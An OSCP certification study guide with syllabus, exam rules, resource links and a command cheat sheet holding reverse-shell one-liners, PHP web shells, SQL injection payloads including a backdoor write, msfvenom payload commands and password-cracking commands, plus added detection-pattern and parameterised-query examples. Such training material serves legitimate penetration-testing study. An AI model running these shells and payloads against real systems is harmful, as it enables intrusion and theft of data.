OSCP

WHAT IS OSCP?


The Offensive Security Certified Professional (OSCP) is one of the most technical and most challenging certifications for information security professionals.

To become certified you must complete the Penetration Testing with Kali Linux (PwK) course and pass a “24 hour” hands-on exam, after which you have another 24 hours to write the report.

Official Link : PEN-200 | PENETRATION TESTING COURSE & CERTIFICATION

OSCP SYLLABUS


● Getting Comfortable with Kali Linux
● Command Line Fun
● Practical Tools
● Bash Scripting
● Passive Information Gathering
● Active Information Gathering
● Vulnerability Scanning
● Web Application Attacks
● Buffer Overflows
● Client-Side Attacks
● Locating Public Exploits
● Fixing Exploits
● File Transfers
● Antivirus Evasion
● Privilege Escalation
● Password Attacks
● Port Redirection and Tunneling
● Active Directory Attacks
● The Metasploit Framework
● PowerShell Empire
● Penetration Test Breakdown

PREREQUISITES


Before you register for the course you should have some experience in the following areas :

● Linux Fundamentals : File System, Command Line etc.
● Networking Fundamentals : TCP/IP, Protocols etc.
● Programming Languages : Bash and Python
● Note Taking : Cherry Tree, KeepNote

EXAM DETAILS


● You will have a total of 23 hours and 45 mins for the exam.
● You will be proctored during your exam. Webcam and screen sharing software are required.
● The exam will consist of 5 target systems that are vulnerable and can be compromised.
● You will need a minimum of 70 points to pass.
● If you believe you have enough points you will have another 24 hours to write your report.
● An extra 5 points will be given if you are able to complete the lab report and the course exercises.

Restrictions :

You cannot use any of the following on the exam :

● Spoofing (IP, ARP, DNS, NBNS, etc)
● Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
● Automatic exploitation tools (e.g. browser_autopwn, SQLmap, SQLninja, jsql etc.)
● Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)

Exam Tips :

● Enumeration is the most important thing you can do.
● Prepare your cheat sheets, notes, tools, and exploits.
● Note Everything.
● Keep patience, believe in yourself, and everything will be done easily!

LAB SETUP


VMware Workstation or VirtualBox

Kali Linux
▸ If you want to play with the custom image that is made for the course, you can find it here.

Windows 7 (32bit/64bit)

GETTING STARTED WITH KALI LINUX


Kali Linux Revealed
Linux Journey
Explain Shell
● TryHackMe - Linux Fundamentals
● TryHackMe - Linux Challenges

COMMAND LINE FUN


The Linux Command Line
● The Linux Command Line, 2nd Edition (Book) : Amazon India
● RTFM - Red Team Field Manual (Book) : Amazon India
● BTFM - Blue Team Field Manual (Book) : Amazon India

PRACTICAL TOOLS


● Netcat
● PowerShell
● Wireshark
● Tcpdump

Kali Linux Tools : https://tools.kali.org/tools-listing

BASH SCRIPTING


Bash Resource
● Linux Command Line and Shell Scripting Bible (Book) : Amazon India

PASSIVE INFORMATION GATHERING


In the passive information gathering phase we collect information about the targets from publicly available sources, without interacting with the targets themselves.

Taking Notes
● Website Recon : Gather basic information by simply browsing the site.
● Whois Enumeration : Use the whois command on Linux or an online tool
● Open-Source Code : Search the target's source code online
● Social Media Tools : Gather information from the target's social media accounts
● Google Hacking : Cheatsheet / Database
Netcraft
The Recon-ng Framework
Shodan
Spyse
Censys
Security Headers Scanner
SSL Server Test
Pastebin
Email Harvesting
Stack Overflow
OSINT Framework

ACTIVE INFORMATION GATHERING


In active information gathering we learn more about these targets by interacting with them directly, for example through port scanning, OS fingerprinting, and DNS, SMB, NFS, SMTP and SNMP enumeration.

The Official Nmap Project Guide
Nmap
Masscan
DNS Recon

VULNERABILITY SCANNING


Nessus / Getting Started with Nessus on Kali Linux
Sn1per
Nexpose
Nipper
Acunetix
OpenVAS

WEB APPLICATION ATTACKS


● Web Application Enumeration : View the page source code; check well-known files (robots.txt, security.txt, .git, readme.md, sitemap.xml etc.); discover files and directories; brute force login pages; check subdomains; find open ports; identify which web technologies the target website is using.
Burp Suite
OWASP Top Ten
● The Web Application Hacker's Handbook : Amazon India

CLIENT-SIDE ATTACKS


Types of Client-Side Attacks
● Metasploit Unleashed : Client Side Attacks

FIXING EXPLOITS


Generating our own payload

PASSWORD ATTACKS


Offline Password Cracking :

Hashcat
John the Ripper

Online Password Cracking :

Hydra
Medusa

Wordlist Generators :

Cewl
Crunch

Wordlist :

● Kali Linux includes a lot of dictionary files in the /usr/share/wordlists directory
Seclists Password Wordlist

Online Password Hash Cracker :

https://crackstation.net/
https://onlinehashcrack.com/
https://gpuhash.me/
https://dcode.fr/hash-function#f0

PORT REDIRECTION AND TUNNELING


SSH Tunneling / Pivoting
Proxychains
SSHuttle
Rinetd
Windows Port Forwarding

THE METASPLOIT FRAMEWORK


https://metasploit.com/
Metasploit Unleashed
● Metasploit: The Penetration Tester's Guide (Book) : Amazon India

PENETRATION TEST BREAKDOWN


Resources will be updated soon.

HELPFUL COMMANDS


SANS Cheat Sheets :

The Ultimate List of SANS Cheat Sheets

NMAP :

nmap -sC -sV -vv -oA quick 10.10.10.10
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
nmap -sC -sV -p- -vv -oA full 10.10.10.10
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.10; done


WEB SCANNING :

gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php
nikto -h 10.10.10.10
wpscan --url http://10.10.10.10/wp/


PORT CHECKING :

nc -v 10.10.10.10 port
telnet 10.10.10.10 port


NETCAT :

Download Netcat for Windows : http://bit.ly/netcat_exe

nc -l -p 1234 > file.zip
nc 10.10.10.10 1234 < file.zip


FILE TRANSFER :

python -m SimpleHTTPServer 80
python3 -m http.server 80
wget 10.10.10.10/file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
python -m pyftpdlib -p 21 -w
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
atftpd --daemon --port 69 /tftp
tftp -i 10.10.10.10 GET nc.exe


SSH :

ssh user@10.10.10.10
ssh -i id_rsa user@10.10.10.10
ssh-keygen
chmod 644 id_rsa.pub
chmod 600 id_rsa
wget https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py
cp sshng2john.py /opt/JohnTheRipper/run/
python /opt/JohnTheRipper/run/sshng2john.py id_rsa > USERHASH
john --wordlist=/usr/share/wordlists/rockyou.txt USERHASH
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10


SSH TUNNELING / PIVOTING :

sshuttle -vvr user@10.10.10.10 10.0.0.1/24
ssh gateway -L local-port-to-listen:10.10.10.10:remote-port
ssh gateway -R remote-port-to-bind:127.0.0.1:local-port
ssh -D local-proxy-port -p remote-port 10.10.10.10
plink -l root -pw pass -R 3389:127.0.0.1:3389 10.10.10.10


SMB :

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
enum4linux -a 10.10.10.10
rpcclient -U "" 10.10.10.10
smbclient //MOUNT/share


SNMP :

snmp-check 10.10.10.10


REVERSE SHELL :

bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
nc -e /bin/sh 10.10.10.10 4443
nc -e cmd.exe 10.10.10.10 4443
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
xterm -display 10.10.10.10:1
Xnest :1
xhost +10.10.10.10
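A defender's counterpart to the one-liners above, added here as an example (not part of the original cheat sheet): a small Python scanner that flags these reverse-shell patterns in process command-line logs. The log lines and their field layout are constructed for the example; the patterns are a starting point to tune against your own telemetry.

```python
import re

# Indicator patterns for the reverse-shell one-liners listed above.
# Constructed for this example; tune them for your own telemetry.
REVERSE_SHELL_PATTERNS = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat -e shell", re.compile(r"\bnc(?:\.exe)?\b.*\s-e\s+(?:/bin/(?:ba)?sh|cmd\.exe)")),
    ("python socket dup2 shell", re.compile(r"\bpython\d?\s+-c\s+.*socket\.socket.*dup2")),
    ("perl socket exec shell", re.compile(r"\bperl\s+-e\s+.*Socket.*exec\(")),
    ("php fsockopen shell", re.compile(r"\bphp\s+-r\s+.*fsockopen.*exec\(")),
    ("ruby TCPSocket shell", re.compile(r"\bruby\s+-rsocket.*TCPSocket\.open.*\bexec\b")),
]


def classify(cmdline):
    """Return the names of every indicator that matches one process command line."""
    return [name for name, pat in REVERSE_SHELL_PATTERNS if pat.search(cmdline)]


def scan_log(lines):
    """Return (line_number, [indicator names]) for each log line that matches."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = classify(line)
        if found:
            hits.append((number, found))
    return hits


# Constructed process-execution log lines (not real data); lines 1 and 4 are benign.
SAMPLE_LOG = [
    "2024-05-01T10:00:01 host=web01 user=www-data cmd=nc -zv 10.10.10.10 80",
    "2024-05-01T10:00:02 host=web01 user=www-data cmd=bash -i >& /dev/tcp/10.10.10.10/4443 0>&1",
    "2024-05-01T10:00:03 host=web01 user=www-data cmd=python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",1234));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "2024-05-01T10:00:04 host=db01 user=backup cmd=python3 -c 'import socket; print(socket.gethostname())'",
    "2024-05-01T10:00:05 host=web01 user=www-data cmd=nc -e /bin/sh 10.10.10.10 4443",
]

if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(names)}")
```

Running it reports lines 2, 3 and 5; the benign `nc -zv` port check and the harmless `socket.gethostname()` call on line 4 are not flagged.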


PHP :

<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>


POWERSHELL :

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1


SQL INJECTION :

sqlmap -u http://10.10.10.10 --crawl=1
sqlmap -u http://10.10.10.10 --dbms=mysql --dump
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell
union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
' or 1=1 LIMIT 1 -- 
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 -- 
' or 1=1 -- -
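Added example, not from the original cheat sheet: the `' or 1=1 LIMIT 1 -- ` payload listed above run against a string-built login query and against its parameterised equivalent, using Python's sqlite3 module and a constructed users table.

```python
import sqlite3

# The payload turns a string-built query into "WHERE username = '' or 1=1 LIMIT 1 -- ...":
# "or 1=1" is true for every row and "-- " comments out the password check that follows.
INJECTION_PAYLOAD = "' or 1=1 LIMIT 1 -- "


def setup_db():
    """Constructed in-memory users table (example data, not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "CorrectHorse"), ("alice", "BatteryStaple")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query with string formatting, so user input is parsed as SQL syntax."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Binds the input as parameters, so it is only ever compared as data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, INJECTION_PAYLOAD, "wrong"))  # admin
    print("safe:      ", login_safe(db, INJECTION_PAYLOAD, "wrong"))        # None
```

The `#` variants in the list above are MySQL comment syntax and are a syntax error in SQLite, which only understands `--` and `/* */`; that difference is why the cheat sheet carries several comment styles.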


BRUTE FORCE :

unshadow passwd shadow > unshadow.db
john unshadow.db
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username   # sha512crypt ($6$)
hashcat -m 500 -a 0 hash.txt rockyou.txt --username    # md5crypt ($1$)
hashcat -m 1600 -a 0 hash.txt rockyou.txt              # Apache apr1 MD5
hashcat -m 100 -a 0 hash.txt rockyou.txt --force       # SHA1
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt      # phpass (WordPress, phpBB)
ncrack -vv --user offsec -P passwords rdp://10.10.10.10
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp


MSFVENOM PAYLOADS :

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe


SHELL SPAWNING :

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo $TERM
stty -a
os.system('/bin/bash')          # from inside a Python interpreter
/bin/sh -i
exec "/bin/sh";                 # from inside a Perl interpreter
perl -e 'exec "/bin/sh";'
exec "/bin/sh"                  # Ruby
os.execute('/bin/sh')           # Lua
exec "/bin/sh"                  # from inside irb
:!bash                          # from inside vi/vim
:set shell=/bin/bash:shell      # from inside vi/vim
!sh                             # from inside nmap --interactive


PRACTICE LABS


VulnHub :

List of PWK/OSCP Boxes

HackTheBox :

IPPSEC (YouTube)
TJ_Null’s OSCP Prep

TRAINING


Our Paid Training : https://hacktronian.in/training
